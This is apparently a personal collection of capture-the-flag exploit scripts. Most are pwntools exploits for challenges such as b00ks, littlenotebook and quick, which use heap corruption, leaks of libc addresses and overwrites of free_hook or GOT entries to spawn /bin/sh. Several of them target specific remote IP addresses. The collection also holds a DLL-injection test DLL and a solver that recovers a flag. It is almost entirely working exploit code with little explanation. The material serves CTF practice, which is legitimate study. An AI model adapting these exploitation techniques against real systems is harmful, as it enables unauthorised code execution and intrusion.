p.recv()
p.sendline('Methamphetamine' + '\xff\xff')
p.sendline('/bin/sh\x00')
p.interactive()
i春秋_3.7Z
from pwn import *
def login(data):
payload = ''
for i in range(len(data)):
payload += chr(i^ord(data[i]))
return payload
#p = process('./http')
p = remote( '106.75.2.53',80)
payload = 'User-Agent: '+login('useragent')
print payload
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
p.send(payload)
p.interactive()
p.interactive()
MsgDLL.dll
当dll注入成功后,填出一个消息框
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include<stdio.h>
//extern "C" _declspec(dllexport)
DWORD APIENTRY Msg(LPVOID lpParameter)
{
char szPath[MAX_PATH] = { 0 };
char szBuf[1024] = { 0 };
GetModuleFileName(NULL, LPWSTR(szPath), MAX_PATH);
sprintf_s(szBuf, "DLL已注入到进程 %s [Pid = %d]\n", szPath, GetCurrentProcessId());
MessageBoxA(NULL, szBuf, "DLL Inject", MB_OK);
printf("%s\n", szBuf);
OutputDebugString(LPWSTR(szBuf));
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
CreateThread(NULL, 0, Msg, NULL, 0, NULL);
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
输出函数为Msg:
//Source.def
LIBRARY "MsgDll"
EXPORTS
Msg
x计划_littlenotebook
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './littlennotebook'
p = process(name)
elf= ELF(name)
if args.G:
gdb.attach(p)
def add(num,data):
p.recvuntil('your choice?\n')
p.sendline("1")
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.recvuntil('input the content:')
p.sendline(str(data))
def edit(i,num,data):
p.recvuntil('your choice?\n')
p.sendline("2")
p.recvuntil('enter the index of notebook:\n')
p.sendline(str(i))
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.sendline(str(data))
def delete(i):
p.recvuntil('your choice?\n')
p.sendline("3")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
def show(i):
p.recvuntil('your choice?\n')
p.sendline("4")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
#0x4009A7
#0x60209C
add(20,'a'*8)
add(20,'b'*8)
add(20,'c'*8)
delete(2)
delete(1)
pay1 = 'a'*24 + p64(0x21) + p64(0x60209C)
edit(0,40,pay1)
add(20,'/bin/sh\x00')
pay2 = p64(0x0000001400000002) + p64(0x60201800000000)
add(20,pay2)
show(0)
p.recvuntil('0:')
free_addr = u64(p.recv(6) + '\x00\x00')
lib_add = free_addr - 0x82ba0
system_addr = lib_add + 0x42510
success("free_addr: " + hex(free_addr))
success("lib_add: " + hex(lib_add))
success("system_addr: " + hex(system_addr))
edit(1,20,'/bin/sh\x00')
edit(0,8,p64(system_addr))
delete(1)
p.interactive()
Asis CTF 2016 b00ks
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './b00ks'
p = process(name)
#p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.G:
gdb.attach(p)
def creat(nsize,ndata,dsize,data):
p.recvuntil('> ')
p.sendline('1')
p.recvuntil('Enter book name size: ')
p.sendline(str(nsize))
p.recvuntil('Enter book name (Max 32 chars): ')
p.sendline(str(ndata))
p.recvuntil('Enter book description size: ')
p.sendline(str(dsize))
p.recvuntil('Enter book description: ')
p.sendline(str(data))
def delete(i):
p.recvuntil('> ')
p.sendline('2')
p.recvuntil('Enter the book id you want to delete: ')
p.sendline(str(i))
def edit(i,data):
p.recvuntil('> ')
p.sendline('3')
p.recvuntil('Enter the book id you want to edit: ')
p.sendline(str(i))
p.recvuntil('Enter new book description: ')
p.sendline(data)
def show():
p.recvuntil('> ')
p.sendline('4')
def change(data):
p.recvuntil('> ')
p.sendline('5')
p.recvuntil('Enter author name: ')
p.sendline(data)
#泄露heap地址
p.recvuntil('Enter author name: ')
p.sendline('a'*28 + 'q'*4)
creat(128,'b',32,'c')
creat(0x21000,'/bin/sh\x00',0x21000,'/bin/sh\x00')
show()
p.recvuntil('qqqq')
heap_addr = u64(p.recv(6) + '\x00\x00')
#泄露libc地址
pay1 = p64(1) + p64(heap_addr + 0x38) + p64(heap_addr - 0x30) + p64(0x32)
edit(1,pay1)
change('a'*28 + 's'*4)
show()
p.recvuntil('Name: ')
libc_addr = u64(p.recv(6) + '\x00\x00') - 0x59c010
free_hook = libc_addr + 0x3b68e8
#one_gadget = libc_addr + 0x4239e # 0x423f2 #0xe317e
system_addr = libc_addr + 0x42510
success("heap_aadr: " + hex(heap_addr))
success("libc_addr: " + hex(libc_addr))
success("free_hook: " + hex(free_hook))
success("system_addr: " + hex(system_addr))
#将free_hook地址内容写为system_addr,也可以写为one_gadget_addr
pay2 = p64(1) + p64(heap_addr + 0x38) + p64(free_hook) + p64(0x32)
edit(1,pay2)
pay3 = p64(system_addr) + p64(system_addr)
edit(1,pay3)
#getshell
delete(2)
p.interactive()
WhaleCTF_逆向练习
#include<stdio.h>
#include<string.h>
int main()
{
int esi,bl,ebx,i;
char flag[0x12];
char str[] = "sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138";
int num[] = {0x1,0x4,0xe,0xa,0x5,0x24,0x17,0x2a,0xd,0x13,0x1c,0xd,
0x1b,0x27,0x30,0x29,0x2a};
for(i=0;i<0x11;i++)
{
flag[i] = str[num[i]];
}
printf("flag: %s",flag);
// e2s6ry3r5s8f61024
return 0;
}
*ctf_quick
from pwn import *
import struct
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './quick'
#p = process(name)
p=remote('34.92.96.238',10000)
elf= ELF(name)
libc = ELF('./libc.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('2')
pay1 = str(elf.plt['printf']) + '\x00'*(16-len(str(elf.plt['printf']))) + p32(0x2) + p32(0x0) + p32(0x0) + p32(0x804a024) + 'a'*16 + p32(elf.plt['puts']) + p32(0x8048816) + p32(0x804a02c)
p.recvuntil('the 1th number:')
p.sendline(pay1)
pay2 = '134514016' + '\x00'*7 + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a018-4)
p.recvuntil('the 2th number:')
p.sendline(pay2)
p.recvuntil('Here is the result:')
x = p.recv()
lib_main_addr = u32(x[64:68])
libc_addr = lib_main_addr - libc.symbols['__libc_start_main'] #0x18d90
system_addr = libc_addr + libc.symbols['system'] #0x3cd10 #
binsh_addr = libc_addr + next(libc.search('/bin/sh')) #0x17b988 #
print(hex(libc.symbols['__libc_start_main']))
#p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('1')
x = struct.unpack("i",p32(system_addr))
x = x[0]
print("x: " + str(x))
pay2 = str(x) + '\x00'*(16-len(str(x))) + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a024) + 'a'*16 + p32(system_addr) + p32(0x8048816) + p32(binsh_addr)
p.recvuntil('the 1th number:')
p.sendline(pay2)
success("lib_main_addr: " + hex(lib_main_addr))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
p.interactive()